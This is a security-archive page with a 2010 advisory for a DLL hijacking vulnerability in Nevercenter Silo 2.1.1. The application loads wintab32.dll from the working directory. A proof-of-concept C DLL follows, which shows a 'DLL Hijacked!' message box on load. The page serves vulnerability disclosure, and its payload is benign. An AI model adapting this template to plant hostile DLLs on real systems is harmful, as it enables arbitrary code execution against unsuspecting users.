exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Nevercenter Silo 2.1.1 DLL Hijacking

Nevercenter Silo 2.1.1 DLL Hijacking
Posted Nov 9, 2010
Authored by LiquidWorm | Site zeroscience.mk

Nevercenter Silo version 2.1.1 suffers from an insecure library loading vulnerability.

tags | exploit
SHA-256 | a8efe6fae5684a04b324c1c5767de49ec3e6db985ea14cf607c89df68bc2a109

Nevercenter Silo 2.1.1 DLL Hijacking

Change Mirror Download
/*

Nevercenter Silo 2.1.1 Insecure Library Loading Vulnerability


Vendor: Nevercenter Ltd. Co.
Product web page: http://www.nevercenter.com
Affected version: 2.1.1

Summary: Silo 2 is a focused 3D modeling application with the
ability to effortlessly switch between organically sculpting
high-polygon models and precisely controlling hard-edged surfaces.
It can be used for anything from creating 3D characters for video
games and movies to quickly exploring 3D architectural ideas. Silo
is currently being used at top studios worldwide as both a stand-alone
design tool and as a versatile element of a multi-software 3D graphics
workflow. It is available for both Windows and Mac OS.

Desc: Silo 2 suffers from a DLL hijacking vulnerability, which could be
exploited by remote attackers to compromise a vulnerable system.
This issue is caused due to the application insecurely loading certain
librairies ("wintab32.dll") from the current working directory, which
could allow attackers to execute arbitrary code by tricking a user into
opening an audio file (.sib) from a network share.

Tested on: Microsoft Windows XP Professional SP3 (EN)

Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
liquidworm gmail com

Zero Science Lab - http://www.zeroscience.mk

Advisory ID: ZSL-2010-4972
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4972.php

07.11.2010

*/


#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_mll();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}

return TRUE;
}

int dll_mll()
{
MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    0 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close